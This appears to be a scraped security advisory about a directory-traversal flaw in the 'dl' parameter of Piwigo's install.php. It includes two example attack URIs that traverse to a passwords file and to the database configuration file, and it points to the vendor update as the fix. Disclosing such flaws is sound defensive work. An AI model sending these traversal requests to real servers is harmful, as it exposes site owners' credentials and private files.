Piwigo Arbitrary File Disclosure and Arbitrary File Deletion Vulnerabilities
BID:58016
Info
Piwigo Arbitrary File Disclosure and Arbitrary File Deletion Vulnerabilities
| Bugtraq ID: | 58016 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 18 2013 12:00AM |
| Updated: | Feb 18 2013 12:00AM |
| Credit: | Gjoko Krstic |
| Vulnerable: | |
| Not Vulnerable: | |
Discussion
Piwigo 'dl' Parameter Directory Traversal Vulnerability
Piwigo is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.
A remote attacker can use directory-traversal strings to retrieve arbitrary files in the context of the affected application.
Versions prior to Piwigo 2.4.7 are vulnerable.
Piwigo is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.
A remote attacker can use directory-traversal strings to retrieve arbitrary files in the context of the affected application.
Versions prior to Piwigo 2.4.7 are vulnerable.
Exploit / POC
Piwigo 'dl' Parameter Directory Traversal Vulnerability
Attackers can exploit these issues through a browser.
The following example URI is available:
http://www.example.com/piwigo/install.php?dl=../../../../../../lio_passwords.txt
http://www.example.com/piwigo/install.php?dl=/../../local/config/database.inc.php
Attackers can exploit these issues through a browser.
The following example URI is available:
http://www.example.com/piwigo/install.php?dl=../../../../../../lio_passwords.txt
http://www.example.com/piwigo/install.php?dl=/../../local/config/database.inc.php
Solution / Fix
Piwigo 'dl' Parameter Directory Traversal Vulnerability
Solution:
Updates are available. Please see the references or vendor advisory for more information.
Solution:
Updates are available. Please see the references or vendor advisory for more information.